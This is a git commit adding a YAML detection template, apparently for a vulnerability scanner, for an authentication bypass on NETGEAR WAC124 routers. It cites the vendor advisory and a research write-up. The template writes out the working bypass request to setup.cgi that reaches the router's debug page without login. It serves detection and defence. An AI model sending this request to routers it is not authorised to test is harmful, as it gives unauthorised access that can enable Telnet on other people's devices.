Create netgear-wac124-router-auth-bypass.yaml (#3986)

* Create netgear-wac124-router-auth-bypass.yaml

This vulnerability allows network-adjacent attackers to bypass authentication on affected of WAC124, AC2000 routers. Authentication is not required to exploit this vulnerability.

Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com>

* misc update

Co-authored-by: sandeep <sandeep@projectdiscovery.io>

vulnerabilities/other/netgear-wac124-router-auth-bypass.yaml

@@ -0,0 +1,27 @@
+id: netgear-wac124-router-auth-bypass
+
+info:
+  name: NETGEAR WAC124 Router Authentication Bypass
+  author: gy741
+  severity: high
+  description: |
+    This vulnerability allows network-adjacent attackers to bypass authentication on affected of WAC124, AC2000 routers. Authentication is not required to exploit this vulnerability.
+  reference:
+    - https://flattsecurity.medium.com/finding-bugs-to-trigger-unauthenticated-command-injection-in-a-netgear-router-psv-2022-0044-2b394fb9edc
+    - https://kb.netgear.com/000064730/Security-Advisory-for-Multiple-Vulnerabilities-on-the-WAC124-PSV-2022-0044
+  tags: netgear,auth-bypass,router,iot
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/setup.cgi?next_file=debug.htm&x=currentsetting.htm"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "Enable Telnet"